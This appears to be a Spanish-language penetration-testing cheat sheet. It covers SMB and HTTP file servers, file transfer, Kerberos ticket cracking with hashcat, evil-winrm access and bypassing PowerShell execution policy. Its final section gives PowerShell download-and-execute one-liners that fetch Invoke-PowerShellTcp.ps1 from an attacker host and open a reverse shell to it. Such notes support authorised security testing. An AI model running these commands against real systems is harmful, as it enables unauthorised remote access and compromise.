Misc

Servidores temporales

SMB

Se busca el binario de impacket-smbserver:

> locate smbserver

/usr/bin/impacket-smbserver
/usr/lib/python3/dist-packages/impacket/smbserver.py
/usr/lib/python3/dist-packages/impacket/__pycache__/smbserver.cpython-310.pyc
/usr/share/doc/python3-impacket/examples/smbserver.py

Se sirve una carpeta compartida vía SMB:

sharedfolder=/tmp/tempserver
mkdir $sharedfolder
cd $sharedfolder
impacket-smbserver share . -smb2support -username xtormin -password xtormin

HTTP

HFS

https://www.rejetto.com/hfs/

Se ejecuta el binario hfs.exe descargado desde la interfaz gráfica y se añaden los ficheros que se deseen exponer en el servidor web.

Python

python3 -m http.server 8000

Transferencia de ficheros

Linux

wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1

Windows

iwr https://192.168.1.110/winPEASx64.exe -outputfile winpeas64.exe
IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5:8000/Azure-ADConnect.ps1')

> Descarga de repositorios

En ocasiones, el navegador puede bloquear la descarga de ficheros que identifica como maliciosos. Una forma de descargarlos cuando es usando Git con su versión portable cuando no se pueda instalar o no se cuente con permisos de administrador local.

Git

https://git-scm.com/download/win/

cd PortableGit-2.46.2-64-bit
.\git-bash.exe

Esto abrirá una consola desde la que se podrá clonar el repositorio:

cd c/Pentest/Tools
git clone https://github.com/PowerShellMafia/PowerSploit.git

Cracking

Ticket de kerberos

hashcat -m 18200 hash/svc-test.hc18200 /usr/share/wordlists/rockyou.txt --force

Conexión remota

Windows

evil-winrm -i 192.168.1.100 -u <usuario> -p <contraseña>

Habilitar ejecución de scripts

El siguiente comando permite modificar la política de PowerShell de forma que se permita la ejecución de todos los scripts sin firmar y sin aplicar restricciones ni advertencias (-exec bypass). Además, no se carga el perfil del usuario, lo que permite evadir posibles restricciones (-nop).

powershell -nop -exec bypass

Reverse shell

Desde la máquina atacante:

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

Desde la máquina víctima:

powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://192.168.1.100/Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress 192.168.1.100 -Port 443

powershell.exe iex (iwr http://192.168.1.100/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 192.168.1.100 -Port 443

Agregar excepción en el firewall

Última actualización

¿Te fue útil?